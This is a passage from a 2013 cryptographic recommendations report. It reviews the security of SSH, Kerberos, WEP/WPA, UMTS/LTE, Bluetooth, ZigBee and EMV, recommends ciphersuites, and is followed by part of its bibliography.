Algorithms, Key Size and Parameters Report – 2013 Recommendations
of SSH [349] is responsible for the initial key-exchange, server authentication and, confidentiality
and integrity of messages sent on the channel.
The key-exchange protocol is based on Diffie–Hellman and host authentication is provided by
combining this with a signature. Client authentication is also possible but defined in a separate RFC
[347]. Methods for authenticating the client are either using a password, public-key cryptography
(DSA, RSA, X.509), an “interactive-keyboard” challenge-response method [87] or the GSSAPI [221]
which allows the use of external mechanisms such as Kerberos. Support for the key-exchange
methods, diffie-hellman-group1-sha1 anddiffie-hellman-group14-sha1 is mandated by the
RFC [349]. These methods use the Oakley Group 1 (1024-bit prime field) and Oakley Group 14
(2048-bit prime field) [200]. RFC4419 [128] describes a key-exchange method for SSH that allows
the server to propose new groups on which to perform the Diffie–Hellman key exchange with the
client. RFC4432 [145] specifies a key-transport method for SSH based on 1024-bit and 2048-bit
RSA. RFC5656 [323] defines introduces support for Elliptic-Curve Cryptography; detailing support
for ECDH and ECMQV.
Williams [345] has performed an analysis of the key-exchange methods in SSH. It has been shown
the six application keys (two IV keys, two encryption keys and two integrity keys) generated by the
protocol and passed to the next stage of the SSH protocol are indistinguishable from random. The
analysis assumes the server’s public key is validated through a certificate from some secure public-
key infrastructure. The author of [345] notes that if no such certificate is used, then the protocol
is vulnerable to attack, unless the client has some other method of verifying the authenticity of a
server’s public key.
Once keys are established all message are then sent encrypted over the channel using the Binary-
Packet Protocol (BPP) [349, Section 6]. This specifies an encryption scheme based on an Encode-
then-Encrypt-and-MAC construction using a block cipher in CBC mode or the stream cipher RC4.
The encode function specifies two length fields which must be prepended to messages prior to
encryption and a padding scheme (for the case of CBC mode). The first length field specifies the
total length of the packet and the second gives the total length of padding used. The specification
recommends using CBC mode with chained IVs (the last block of the previous ciphertext becomes
the IV of the following ciphertext). This has been shown to be insecure by Dai [89] and Rogaway
[295]. Albrecht et al. [10] were able to perform plaintext-recovery attacks against SSH (when using
CBC mode) by exploiting the use of encrypted length fields. As a result of these attacks we state
that CBC mode should not be used. We note that OpenSSH Version 6.2 [1] supports a non-standard
version of the BPP for use with CBC mode in an Encrypt-then-MAC construction where length
fields are notencrypted but still authenticated. This style of construction would be secure against
the Albrecht et al. attack.
A first formal security analysis of the SSH-BPP was performed by Bellare et al. [31]. As a result
of the Albrecht et al. attacks this security analysis was proved to be incomplete and a further security
analysis, which more closely matched actual implementations of SSH, was performed by Paterson
and Watson [275]. They proved that the Encode-then-Encrypt-and-MAC construction utilizing
counter mode encryption is secure against a large class of attacks including those of Albrecht et al.
Page: 59
Algorithms, Key Size and Parameters Report – 2013 Recommendations
We recommend counter mode as the best choice of available cipher in the Encode-then-Encrypt-
and-MAC construction when combined with a secure MAC algorithm. The original choice of MAC
algorithms specified in RFC4253 was limited to HMAC with either SHA-1 or MD5. We recommend
neither of these hash functions for current use. RFC6668 [39] details the use of SHA-2 for HMAC.
In addition to the Encode-then-Encrypt-and-MAC construction confidentiality and integrity in
SSH may also be provided by GCM encryption as specified in RFC5647 [161].
A complete list of ciphersuites for SSH is listed at the website http://www.iana.org/assignments/
ssh-parameters/ssh-parameters.xml . Based on the recommendations of this document we
would only recommend the following encryption and MAC algorithms, for future use within SSH:
•aes128-ctr with hmac-sha2-256 orhmac-sha2-512
•aes192-ctr with hmac-sha2-256 orhmac-sha2-512
•aes256-ctr with hmac-sha2-256 orhmac-sha2-512
•AEAD_AES_128_GCM
•AEAD_AES_256_GCM
5.1.5 Kerberos
Kerberos is an authentication service which allows a client to authenticate his or herself to multiple
services e.g. a file server or a printer. The system uses a trusted authentication server which
will grant tickets to participating parties allowing them to prove their identity to each other. It
is primarily based on symmetric-key primitives; the specific construction being derived from the
Needham-Schroeder Protocol [252]. Public-key primitives, namely RSA signatures, may also be
used during the initial authentication phase [350].
Kerberos was designed as part of project Athena at MIT during the 1980s [243]; the first
three versions were not released publicly; Version 4 can therefore be viewed as the “original”
release. The current version, Version 5 [253], fixed a number of security deficiencies present in
its predecessor [37]. Version 4 required the use of DES; Version 5 expanded the possible ciphers
and AES is now supported [291]. Additionally, Version 4 made use of a non-standard version of
CBC mode called PCBC which has been shown to be insecure [204]. The encryption scheme used
by Version 5 has been formally analyzed by Boldyreva and Kumar [54]. They first show that the
Encode-then-Checksum-then-Encrypt construction defined in RFC3961 [292] does not meet the
INT-CTXT notion of security. If a secure MAC algorithm is used for the checksum then this
construction will be secure. Additionally, Boldyreva and Kumar analyse the Encode-then-Encrypt-
and-MAC construction given in RFC3962 [291] and show this to be secure assuming the underlying
primitives meet standard notions of security. The encryption scheme specified for use in Version 5
is CBC mode with ciphertext stealing using either DES, 3DES [292], AES [291] or Camellia [156]
as the underlying blockcipher.
Page: 60
Algorithms, Key Size and Parameters Report – 2013 Recommendations
A complete list of ciphersuites for Kerberos is listed at the website http://www.iana.org/
assignments/kerberos-parameters/kerberos-parameters.xml . At the time of writing we rec-
ommend the following ciphersuites for future use within Kerberos:
•aes128-cts-hmac-sha1-96
•aes256-cts-hmac-sha1-96
•camellia128-cts-cmac
•camellia256-cts-cmac
5.2 Application Specific Protocols
5.2.1 WEP/WPA
The protocols surveyed in this section are used to protect communication in wireless networks. We
discuss their use in the setting where the device and the access point to which it connects have a
shared key.
WEP (Wired Equivalent Privacy) is specified in the IEEE 802.11 standard [157]. The protocol
is intended to offer private and authenticated communication. The protocol is symmetric key
based (it uses either 40 bit, 104 bit, or 232 bit keys) and employs RC4 for privacy and CRC32 for
authentication. Practical key-recovery attacks against the protocols have been devised [48,123,329]
and the protocol is considered completely broken. The use of this protocol should be avoided. WEP
has been deprecated by the IEEE.
WPA (Wi-Fi Protected Access) is a successor of WEP. It employs the Temporal Key Intergrity
Protocol (TKIP) a stronger set of encryption and authentication algorithms; but TKIP has been
deprecated by the IEEE. The protocol was intended as a temporary replacement for WPA capable
of running on legacy hardware. The protocol fixes some of the desigen problems in WEP, but some
attacks against TKIP have been found [142, 244, 246, 318, 328, 330]. A recent attack, [11], based
on prior analysis of RC4 [12] in TLS, breaks this protocol. Thus uses should move to WPA2 as a
matter of urgency.
WPA2 uses yet stronger primitives (see [158] for the latest version of the standard). It employs
the Counter Cipher mode with Message Authentication Code Protocol (CCMP), an encryption
scheme that uses AES in CCM mode (see Section 4.3.3) and offers both message privacy and
message authentication. While some weaknesses in settings where WPA2 is used exist, no serious
attacks are known against the protocol itself.
5.2.2 UMTS/LTE
The Universal Mobile Telecommunication System (UMTS) and its latest version called Long-Term
Evolution (LTE) are standards for wireless communication in mobile phones and data terminals.
Page: 61
Algorithms, Key Size and Parameters Report – 2013 Recommendations
The standard is developed by the 3rd Generation Parternship Project (3GPP) and is now at version
10. The protocol is intended as a replacement for GSM. All technical specification documents
referenced in this section are available at www.3gpp.org .
Very roughly, the protocol works in two phases, a key-establishment and authentication phase,
and a data transmission phase. UMTS/LTE replaces the one-way authentication protocol used
in GSM (which authenticates the mobile but not the network) with a stronger protocol called
Authentication and Key Agreement (AKA). This is a three party protocol that involves a mobile
station (MS) a serving network (SN) and the home environment (HE). Upon a succcesful execution
of the protocol MS and SN have confirmed that they communicate with valid partners and establish
a shared key. An additional design goal for the protocol is to protect the identity of the mobile
station: an eavesdropper should not be able to determine weather the same mobile station was
involved in two different runs of the protocol.
The key shared between MS and SN is used to implement a bi-directional secure channel between
the two parties. Integrity and confidentiality are implemented (respectively) via algorithms UIA1
and UEA1 (in UMTS) [2] and UIA2 and UEA2 (in LTE) [3]. The algorithms have the same
structure; the difference is determined by the underlying primitive: the Kasumi blockcipher [5] in
UMTS and SNOW 3G streamcipher [4] in LTE.
There are no provable security guarantees for the protocol. The few published analysis for the
protocol are mainly concerned with the anonymity guarantees [24, 206] and indicate that the pro-
tocol is susceptible to a number of attacks against MS privacy. Security of the channel established
via UMTS/LTE had not been thoroughly analyzed. There are a few known theoretical weaknesses
in Kasumi [41] and SNOW 3G [47,199] but these do not seem to translate into attacks against the
secure channel that they implement.
5.2.3 Bluetooth
Bluetooth is technology for exchanging data, securely, over short-distances between up to seven
devices. The protocol stack for Bluetooth was originally standardized as IEEE802.15.1 standard,
which is no longer maintained. The current development is overseen by the Bluetooth Special
Interest Group.
This section discusses the cryptographic features of Bluetooth 2.1; the later versions (the latest
is Bluetooth 4.0) are mainly concerned with improved bandwidth and power efficiency with little
changes to the underlying cryptography.
Operating takes place in two stages. In the “pairing” stage, two Bluetooth devices agree on a
pair of keys, an initialization key used for mutual authentication via a challenge response protocol
based on HMAC-SHA-256; after authentication succeeds, the devices also agree on a link key for
encrypting the traffic. Since Bluetooth 2.1 this stage is implemented with Elliptic Curve Diffie-
Hellman (ECDH); depending on the capabilities of the devices involved, several mechanisms for
providing protection against man-in-the-middle can be used. Data is encrypted in Bluetooth using
streamcipher E0. Each packet is XORed with a keystream obtained by running the E0 algorithm
Page: 62
Algorithms, Key Size and Parameters Report – 2013 Recommendations
on several inputs, one of which is the key link and another is a unique identifier.
The main weakness of Bluetooth is the pairing phase. Although stronger than in Bluetooth
1.0-2.0, pairing is still open to MITM attacks for devices without user input/output capabilities
or other out-of-band communication means, or in configurations where a predefined PIN. As far
as privacy of the communication goes, the few known theoretical attacks against E0 [122, 149] do
not seem to impact privacy of messages. Message integrity protection is implemented with a cyclic
redundancy code and is therefore minimal.
5.2.4 ZigBee
ZigBee is a radio communication standard which can be considered to operate mainly at lower
power and ranges than Bluetooth. The key idea is to provide extended ranges by utilizing mesh
networks of ZigBee connected devices. Bulk data encryption and authentication is based on
the symmetric key mechanisms of IEEE 802.15.4 [159], and key management is implemented
either by active key management with ZigBee-specific uses of ECDSA/ECDH or by predistri-
bution of symmetric keys. The main algorithms are AES in CTR mode, an AES based CBC-
MAC algorithm outputting either a 32-bit, 64-bit or 128-bit MAC value, or for combined au-
thenticated encryption the use of AES in CCM mode, or a variant of CCM mode called CCM∗.
TLS support is provided with two mandatory cipher suites TLS_PSK_WITH_AES_128_CCM_8 and
TLS_ECDHE_ECDSA_WITH_AES_128_CCM_8 , these derive keying material either via symmetric pre-
shared keys or via a elliptic curve Diffie–Hellman key exchange authenticated with ECDSA re-
spectively. An optional suite of TLS_DHE_RSA_WITH_AES_128_CCM_8 prepares the shared keying
material via a finite field Diffie–Hellman exchange authenticated with RSA signatures.
5.2.5 EMV
The chip-and-pin bank/credit card system follows a specification defined by EMVCo. This doc-
ument is mainly focused on cryptographic aspects and so we will restrict our discussion to the
cryptographic components only; which are defined in “EMV Book 2” [112]. We therefore only
mention in passing a number of systems security level issues observed by others [7,8,55,97,248].
Much of the existing EMV specification dates from before the advent of provable security; thus
many of the mechanisms would not be considered cryptographically suitable for a new system.
For example, the RSA based digital signature is DS1 from the standard ISO 9796-2 [170]; in a
message recovery mode. As already explained in Section 4.8.4, this scheme suffers from a number
of weaknesses, although none have been exploited to any significant effect in the EMV system. As
a second example, the RSA encryption method (used to encrypt PIN blocks in some countries) is
bespoke and offers no security guarantees. The only known analysis of this algorithm is in [322],
which presents a Bleichenbacher-style attack against this specific usage. Another issue is that the
card is allowed to use the same RSA private key for signing and encryption. This is exploited
in [90] via another Bleichenbacher-style attack which converts the decryption oracle provided by
Page: 63
Algorithms, Key Size and Parameters Report – 2013 Recommendations
the Bleichenbacher-style attack into a signing oracle; in turn, this can be used to forge EMV
transaction certificates. It should be stated that neither of the above attacks have been shown to
be exploitable “in the wild”. Rather, they highlight potential problems with the current algorithm
choices.
The symmetric key encryption schemes used in EMV are also slightly old fashioned. Two block
ciphers are supported Triple DES and AES, with the underlying encryption method being CBC
mode. The standard supports two MAC functions, AMAC for use with single DES and CMAC for
use with AES.
EMVCo is currently engaged in the process of renewing their cryptographic specifications to
bring them up to date. There has been a lot of work on defining elliptic curve based schemes
for use in EMV. Some work has been done on analyzing the specific protocols and schemes being
considered for use in the new specifications, for example see [65,90].
Page: 64
Algorithms, Key Size and Parameters Report – 2013 Recommendations
Bibliography
[1] OpenSSH project. http://www.openssh.org/ .
[2] Technical Specificaiton Group Services 3rd Generation Parternship Project and 3G Security
System Aspects. Confidentiality and integrity algorithms UEA1 & UIA1. Document 1: UEA1
and UIA1 specifications.
[3] Technical Specificaiton Group Services 3rd Generation Parternship Project and 3G Security
System Aspects. Confidentiality and integrity algorithms UEA2 & UIA2. Document 1: UEA2
and UIA2 specifications.
[4] Technical Specificaiton Group Services 3rd Generation Parternship Project and 3G Security
System Aspects. Confidentiality and integrity algorithms UEA2 & UIA2. Document 2: SNOW
3G specification.
[5] Technical Specificaiton Group Services 3rd Generation Parternship Project and 3G Security
System Aspects. Specification of the 3GPP confidentiality and integrity algorithms; Docu-
ment 2: KASUMI specification, v.3.1.1.
[6] Carlisle M. Adams, Ali Miri, and Michael J. Wiener, editors. Selected Areas in Cryptogra-
phy, 14th International Workshop, SAC 2007, Ottawa, Canada, August 16-17, 2007, Revised
Selected Papers , volume 4876 of Lecture Notes in Computer Science . Springer, 2007.
[7] Ben Adida, Mike Bond, Jolyon Clulow, Amerson Lin, Ross J. Anderson, and Ronald L.
Rivest. On the security of the EMV secure messaging API (extended abstract). In Bruce
Christianson, Bruno Crispo, James A. Malcolm, and Michael Roe, editors, Security Protocols
Workshop , volume 5964 of Lecture Notes in Computer Science , pages 147–149. Springer, 2007.
[8] Ben Adida, Mike Bond, Jolyon Clulow, Amerson Lin, Steven J. Murdoch, Ross J. Anderson,
and Ronald L. Rivest. Phish and chips. In Bruce Christianson, Bruno Crispo, James A.
Malcolm, and Michael Roe, editors, Security Protocols Workshop , volume 5087 of Lecture
Notes in Computer Science , pages 40–48. Springer, 2006.
Page: 65
Algorithms, Key Size and Parameters Report – 2013 Recommendations
[9] Leonard M. Adleman. The function field sieve. In Leonard M. Adleman and Ming-Deh A.
Huang, editors, ANTS , volume 877 of Lecture Notes in Computer Science , pages 108–121.
Springer, 1994.
[10] Martin R. Albrecht, Kenneth G. Paterson, and Gaven J. Watson. Plaintext recovery attacks
against SSH. In IEEE Symposium on Security and Privacy , pages 16–26. IEEE Computer
Society, 2009.
[11] Nadhem AlFardan, Dan Bernstein, Kenny Paterson, Bertram Poettering, and Jacob Schuldt.
Biases in the RC4 keystream (128 bit uniform vs. WPA/TKIP). http://www.isg.rhul.ac.
uk/tls/tkip_biases.pdf , 2013.
[12] Nadhem J. AlFardan, Daniel J. Bernstein, Kenneth G. Paterson, Bertram Poettering, and
Jacob C.N. Schuldt. On the security of RC4 in TLS. In USENIX Security Symposium .
USENIX Association, 2013. To appear.
[13] Nadhem J. AlFardan and Kenneth G. Paterson. Lucky Thirteen: Breaking the TLS and
DTLS Record Protocols. In IEEE Symposium on Security and Privacy . IEEE Computer
Society, 2013.
[14] Ammar Alkassar, Alexander Geraldy, Birgit Pfitzmann, and Ahmad-Reza Sadeghi. Optimized
self-synchronizing mode of operation. In Mitsuru Matsui, editor, FSE, volume 2355 of Lecture
Notes in Computer Science , pages 78–91. Springer, 2001.
[15] Jee Hea An, Yevgeniy Dodis, and Tal Rabin. On the security of joint signature and encryption.
In Knudsen [203], pages 83–107.
[16] ANSI X9.19. Financial institution retail message authentication. American National Standard
Institute, 1996.
[17] ANSI X9.42. Agreement of symmetric keys using discrete logarithm cryptography. American
National Standard Institute, 2005.
[18] ANSI X9.42. Key agreement and key transport using factoring-based cryptography. American
National Standard Institute, 2005.
[19] ANSI X9.62. Public key cryptography for the financial services industry – The elliptic curve
digital signature algorithm (ECDSA). American National Standard Institute, 2005.
[20] ANSI X9.63. Public key cryptography for the financial services industry – Key agreement
and key transport using elliptic curve cryptography. American National Standard Institute,
2011.
Page: 66
Algorithms, Key Size and Parameters Report – 2013 Recommendations
[21] ANSSI. R ́ ef ́ erentiel G ́ en ́ eral de S ́ ecurit ́ e, Annexe B1 M ́ ecanismes cryptographiques : R ́ egles
et recommandations concernant le choix et le dimensionnement des m ́ ecanismes cryp-
tographiques, Version 1.20 du 26 janvier 2010. http://www.ssi.gouv.fr/IMG/pdf/RGS_
B_1.pdf , 2010.
[22] Kazumaro Aoki, Jian Guo, Krystian Matusiewicz, Yu Sasaki, and Lei Wang. Preimages for
step-reduced SHA-2. In Matsui [230], pages 578–597.
[23] Kazumaro Aoki and Yu Sasaki. Meet-in-the-middle preimage attacks against reduced SHA-0
and SHA-1. In Halevi [140], pages 70–89.
[24] Myrto Arapinis, Loretta Ilaria Mancini, Eike Ritter, and Mark Ryan. Formal analysis of
UMTS privacy. CoRR , abs/1109.2066, 2011.
[25] Jean-Philippe Aumasson, Itai Dinur, Willi Meier, and Adi Shamir. Cube testers and key
recovery attacks on reduced-round MD6 and Trivium. In Orr Dunkelman, editor, FSE,
volume 5665 of Lecture Notes in Computer Science , pages 1–22. Springer, 2009.
[26] Razvan Barbulescu, Pierrick Gaudry, Antoine Joux, and Emmanuel Thom ́ e. A quasi-
polynomial algorithm for discrete logarithm in finite fields of small characteristic, 2013.
[27] Elad Barkan, Eli Biham, and Nathan Keller. Instant ciphertext-only cryptanalysis of GSM
encrypted communication. J. Cryptology , 21(3):392–429, 2008.
[28] Mihir Bellare. New proofs for NMAC and HMAC: Security without collision resistance. In
Dwork [101], pages 602–619.
[29] Mihir Bellare, Ran Canetti, and Hugo Krawczyk. Keying hash functions for message au-
thentication. In Neal Koblitz, editor, CRYPTO , volume 1109 of Lecture Notes in Computer
Science , pages 1–15. Springer, 1996.
[30] Mihir Bellare, Anand Desai, E. Jokipii, and Phillip Rogaway. A concrete security treatment
of symmetric encryption. In FOCS , pages 394–403. IEEE Computer Society, 1997.
[31] Mihir Bellare, Tadayoshi Kohno, and Chanathip Namprempre. Breaking and provably re-
pairing the SSH authenticated encryption scheme: A case study of the Encode-then-Encrypt-
and-MAC paradigm. ACM Trans. Inf. Syst. Secur. , 7(2):206–241, 2004.
[32] Mihir Bellare and Chanathip Namprempre. Authenticated encryption: Relations among
notions and analysis of the generic composition paradigm. In Tatsuaki Okamoto, editor,
ASIACRYPT , volume 1976 of Lecture Notes in Computer Science , pages 531–545. Springer,
2000.
[33] Mihir Bellare, David Pointcheval, and Phillip Rogaway. Authenticated key exchange secure
against dictionary attacks. In Preneel [286], pages 139–155.
Page: 67
Algorithms, Key Size and Parameters Report – 2013 Recommendations
[34] Mihir Bellare and Phillip Rogaway. Entity authentication and key distribution. In Douglas R.
Stinson, editor, CRYPTO , volume 773 of Lecture Notes in Computer Science , pages 232–249.
Springer, 1993.
[35] Mihir Bellare and Phillip Rogaway. Optimal asymmetric encryption. In Alfredo De Santis,
editor, EUROCRYPT , volume 950 of Lecture Notes in Computer Science , pages 92–111.
Springer, 1994.
[36] Mihir Bellare, Phillip Rogaway, and David Wagner. The EAX mode of operation. In Roy
and Meier [302], pages 389–407.
[37] S. M. Bellovin and M. Merritt. Limitations of the Kerberos authentication system. SIGCOMM
Comput. Commun. Rev. , 20(5):119–132, October 1990.
[38] Steven M. Bellovin. Problem areas for the IP security protocols. In Proceedings of the Sixth
Usenix Unix Security Symposium , pages 1–16, 1996.
[39] D. Bider and M. Baushke. SHA-2 Data Integrity Verification for the Secure Shell (SSH)
Transport Layer Protocol. RFC 6668 (Proposed Standard), July 2012.
[40] Eli Biham and Yaniv Carmeli. Efficient reconstruction of RC4 keys from internal states. In
Nyberg [267], pages 270–288.
[41] Eli Biham, Orr Dunkelman, and Nathan Keller. A related-key rectangle attack on the full
KASUMI. In Roy [301], pages 443–461.
[42] Eli Biham and Adi Shamir. Differential cryptanalysis of DES-like cryptosystems. J. Cryp-
tology , 4(1):3–72, 1991.
[43] Alex Biryukov, editor. Fast Software Encryption, 14th International Workshop, FSE 2007,
Luxembourg, Luxembourg, March 26-28, 2007, Revised Selected Papers , volume 4593 of Lec-
ture Notes in Computer Science . Springer, 2007.
[44] Alex Biryukov, Orr Dunkelman, Nathan Keller, Dmitry Khovratovich, and Adi Shamir. Key
recovery attacks of practical complexity on AES-256 variants with up to 10 rounds. In
Gilbert [133], pages 299–319.
[45] Alex Biryukov and Dmitry Khovratovich. Related-key cryptanalysis of the full AES-192 and
AES-256. In Matsui [230], pages 1–18.
[46] Alex Biryukov, Sourav Mukhopadhyay, and Palash Sarkar. Improved time-memory trade-
offs with multiple data. In Bart Preneel and Stafford E. Tavares, editors, Selected Areas in
Cryptography , volume 3897 of Lecture Notes in Computer Science , pages 110–127. Springer,
2005.
Page: 68
Algorithms, Key Size and Parameters Report – 2013 Recommendations
[47] Alex Biryukov, Deike Priemuth-Schmid, and Bin Zhang. Multiset collision attacks on reduced-
round SNOW 3G and SNOW 3G(+). In Jianying Zhou and Moti Yung, editors, ACNS ,
volume 6123 of Lecture Notes in Computer Science , pages 139–153, 2010.
[48] Andrea Bittau, Mark Handley, and Joshua Lackey. The final nail in WEP’s coffin. In IEEE
Symposium on Security and Privacy , pages 386–400. IEEE Computer Society, 2006.
[49] John Black, Shai Halevi, Hugo Krawczyk, Ted Krovetz, and Phillip Rogaway. UMAC: Fast
and secure message authentication. In Wiener [344], pages 216–233.
[50] S. Blake-Wilson, N. Bolyard, V. Gupta, C. Hawk, and B. Moeller. Elliptic Curve Cryptog-
raphy (ECC) Cipher Suites for Transport Layer Security (TLS). RFC 4492 (Informational),
May 2006. Updated by RFC 5246.
[51] Simon Blake-Wilson, Don Johnson, and Alfred Menezes. Key agreement protocols and their
security analysis. In Michael Darnell, editor, IMA Int. Conf. , volume 1355 of Lecture Notes
in Computer Science , pages 30–45. Springer, 1997.
[52] Daniel Bleichenbacher. Chosen ciphertext attacks against protocols based on the RSA en-
cryption standard PKCS #1. In Hugo Krawczyk, editor, CRYPTO , volume 1462 of Lecture
Notes in Computer Science , pages 1–12. Springer, 1998.
[53] Andrey Bogdanov, Dmitry Khovratovich, and Christian Rechberger. Biclique cryptanalysis
of the full AES. In Lee and Wang [213], pages 344–371.
[54] Alexandra Boldyreva and Virendra Kumar. Provable-security analysis of authenticated en-
cryption in Kerberos. IET Information Security , 5(4):207–219, 2011.
[55] Mike Bond, Omar Choudary, Steven J. Murdoch, Sergei P. Skorobogatov, and Ross J. An-
derson. Chip and skim: Cloning EMV cards with the pre-play attack. CoRR , abs/1209.2531,
2012.
[56] Dan Boneh and Xavier Boyen. Efficient selective-ID secure identity-based encryption without
random oracles. In Christian Cachin and Jan Camenisch, editors, EUROCRYPT , volume 3027
ofLecture Notes in Computer Science , pages 223–238. Springer, 2004.
[57] Dan Boneh and Glenn Durfee. Cryptanalysis of RSA with private key d less than n0.292.
IEEE Transactions on Information Theory , 46(4):1339–1349, 2000.
[58] Dan Boneh and Matthew K. Franklin. Identity-based encryption from the Weil pairing. In
Kilian [198], pages 213–229.
[59] Dan Boneh and Matthew K. Franklin. Identity-based encryption from the Weil pairing. SIAM
J. Comput. , 32(3):586–615, 2003.
Page: 69
Algorithms, Key Size and Parameters Report – 2013 Recommendations
[60] Joppe W. Bos and Marcelo E. Kaihara. Playstation 3 computing breaks 260barrier: 112-bit
prime ECDLP solved. EPFL Laboratory for cryptologic algorithms - LACAL, 2009.
[61] Cyril Bouvier. Discrete logarithm in GF(2809) with FFS. Post to NM-
BRTHRY@LISTSERV.NODAK.EDU, 2013.
[62] Gilles Brassard, editor. Advances in Cryptology - CRYPTO ’89, 9th Annual International
Cryptology Conference, Santa Barbara, California, USA, August 20-24, 1989, Proceedings ,
volume 435 of Lecture Notes in Computer Science . Springer, 1990.
[63] Daniel R. L. Brown. Generic groups, collision resistance, and ECDSA. Des. Codes Cryptog-
raphy , 35(1):119–152, 2005.
[64] Christina Brzuska, Marc Fischlin, Nigel P. Smart, Bogdan Warinschi, and Stephen C.
Williams. Less is more: Relaxed yet composable security notions for key exchange. IACR
Cryptology ePrint Archive , 2012:242, 2012.
[65] Christina Brzuska, Nigel P. Smart, Bogdan Warinschi, and Gaven J. Watson. An analysis of
the EMV channel establishment protocol. IACR Cryptology ePrint Archive , 2013:31, 2013.
[66] BSI. Kryptographische Verfahren: Empfehlungen und Schl ̈ ussell ̈ angen. BSI TR-02102 Ver-
sion 2013.2, https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/
TechnischeRichtlinien/TR02102/BSI-TR-02102_pdf.pdf?__blob=publicationFile ,
2013.
[67] Bundesnetzagentur. Bekanntmachung zur elektronischen Signatur nach dem Sig-
naturgesetz und der Signaturverordnung. http://www.bundesnetzagentur.de/
SharedDocs/Downloads/DE/Sachgebiete/QES/Veroeffentlichungen/Algorithmen/
2013Algorithmenkatalog.pdf?__blob=publicationFile&v=1 , 2013.
[68] Ran Canetti and Hugo Krawczyk. Analysis of key-exchange protocols and their use for
building secure channels. In Birgit Pfitzmann, editor, EUROCRYPT , volume 2045 of Lecture
Notes in Computer Science , pages 453–474. Springer, 2001.
[69] Christophe De Canni` ere and Christian Rechberger. Preimages for reduced SHA-0 and SHA-1.
In Wagner [339], pages 179–202.
[70] Anne Canteaut and Kapalee Viswanathan, editors. Progress in Cryptology - INDOCRYPT
2004, 5th International Conference on Cryptology in India, Chennai, India, December 20-22,
2004, Proceedings , volume 3348 of Lecture Notes in Computer Science . Springer, 2004.
[71] Brice Canvel, Alain P. Hiltgen, Serge Vaudenay, and Martin Vuagnoux. Password interception
in a SSL/TLS channel. In Dan Boneh, editor, CRYPTO , volume 2729 of Lecture Notes in
Computer Science , pages 583–599. Springer, 2003.
Page: 70
Algorithms, Key Size and Parameters Report – 2013 Recommendations
[72] Certicom. Certicom announces elliptic curve cryptosystem (ECC) challenge winner. Certicom
Press Release, 2009.
[73] Liqun Chen and Zhaohui Cheng. Security proof of Sakai-Kasahara’s identity-based encryption
scheme. In Nigel P. Smart, editor, IMA Int. Conf. , volume 3796 of Lecture Notes in Computer
Science , pages 442–459. Springer, 2005.
[74] Liqun Chen, Zhaohui Cheng, John Malone-Lee, and Nigel P. Smart. An efficient ID-KEM
based on the Sakai–Kasahara key construction. IEE Proc. Information Security , 153:19–26,
2006.
[75] Jung Hee Cheon. Security analysis of the strong Diffie-Hellman problem. In Vaudenay [336],
pages 1–11.
[76] Carlos Cid and Ga ̈ etan Leurent. An analysis of the XSL algorithm. In Roy [301], pages
333–352.
[77] Don Coppersmith. Finding a small root of a bivariate integer equation; Factoring with high
bits known. In Maurer [231], pages 178–189.
[78] Don Coppersmith. Finding a small root of a univariate modular equation. In Maurer [231],
pages 155–165.
[79] Don Coppersmith. Small solutions to polynomial equations, and low exponent RSA vulner-
abilities. J. Cryptology , 10(4):233–260, 1997.
[80] Don Coppersmith, Matthew K. Franklin, Jacques Patarin, and Michael K. Reiter. Low-
exponent RSA with related messages. In Maurer [231], pages 1–9.
[81] Jean-S ́ ebastien Coron. On the exact security of full domain hash. In Mihir Bellare, editor,
CRYPTO , volume 1880 of Lecture Notes in Computer Science , pages 229–235. Springer, 2000.
[82] Jean-S ́ ebastien Coron. Optimal security proofs for PSS and other signature schemes. In
Knudsen [203], pages 272–287.
[83] Jean-S ́ ebastien Coron, Marc Joye, David Naccache, and Pascal Paillier. New attacks on
PKCS#1 v1.5 encryption. In Preneel [286], pages 369–381.
[84] Jean-S ́ ebastien Coron, David Naccache, and Julien P. Stern. On the security of RSA padding.
In Wiener [344], pages 1–18.
[85] Jean-S ́ ebastien Coron, David Naccache, Mehdi Tibouchi, and Ralf-Philipp Weinmann. Prac-
tical cryptanalysis of ISO/IEC 9796-2 and EMV signatures. In Halevi [140], pages 428–444.
Page: 71
Algorithms, Key Size and Parameters Report – 2013 Recommendations
[86] Nicolas Courtois and Josef Pieprzyk. Cryptanalysis of block ciphers with overdefined systems
of equations. In Yuliang Zheng, editor, ASIACRYPT , volume 2501 of Lecture Notes in
Computer Science , pages 267–287. Springer, 2002.
[87] F. Cusack and M. Forssen. Generic Message Exchange Authentication for the Secure Shell
Protocol (SSH). RFC 4256 (Proposed Standard), January 2006.
[88] Joan Daemen and Vincent Rijmen. The Design of Rijndael: AES - The Advanced Encryption
Standard . Springer, 2002.
[89] W. Dai. An attack against SSH2 protocol. E-mail to the SECSH Working Group available
from ftp://ftp.ietf.org/ietf-mail-archive/secsh/2002-02.mail , 6th Feb. 2002.
[90] Jean Paul Degabriele, Anja Lehmann, Kenneth G. Paterson, Nigel P. Smart, and Mario
Strefler. On the joint security of encryption and signature in EMV. In Orr Dunkelman, editor,
CT-RSA , volume 7178 of Lecture Notes in Computer Science , pages 116–135. Springer, 2012.
[91] Jean Paul Degabriele and Kenneth G. Paterson. Attacking the IPsec standards in encryption-
only configurations. In IEEE Symposium on Security and Privacy , pages 335–349. IEEE
Computer Society, 2007.
[92] Jean Paul Degabriele and Kenneth G. Paterson. On the (in)security of IPsec in MAC-then-
encrypt configurations. In Ehab Al-Shaer, Angelos D. Keromytis, and Vitaly Shmatikov,
editors, ACM Conference on Computer and Communications Security , pages 493–504. ACM,
2010.
[93] T. Dierks and C. Allen. The TLS Protocol Version 1.0. RFC 2246 (Proposed Standard),
January 1999. Obsoleted by RFC 4346, updated by RFCs 3546, 5746, 6176.
[94] T. Dierks and E. Rescorla. The Transport Layer Security (TLS) Protocol Version 1.1. RFC
4346 (Proposed Standard), April 2006. Obsoleted by RFC 5246, updated by RFCs 4366,
4680, 4681, 5746, 6176.
[95] T. Dierks and E. Rescorla. The Transport Layer Security (TLS) Protocol Version 1.2. RFC
5246 (Proposed Standard), August 2008. Updated by RFCs 5746, 5878, 6176.
[96] Itai Dinur, Orr Dunkelman, and Adi Shamir. Collision attacks on up to 5 rounds of SHA-3
using generalized internal differentials. Cryptology ePrint Archive, Report 2012/672, 2012.
http://eprint.iacr.org/ .
[97] Saar Drimer, Steven J. Murdoch, and Ross J. Anderson. Optimised to fail: Card readers
for online banking. In Roger Dingledine and Philippe Golle, editors, Financial Cryptography ,
volume 5628 of Lecture Notes in Computer Science , pages 184–200. Springer, 2009.
Page: 72
Algorithms, Key Size and Parameters Report – 2013 Recommendations
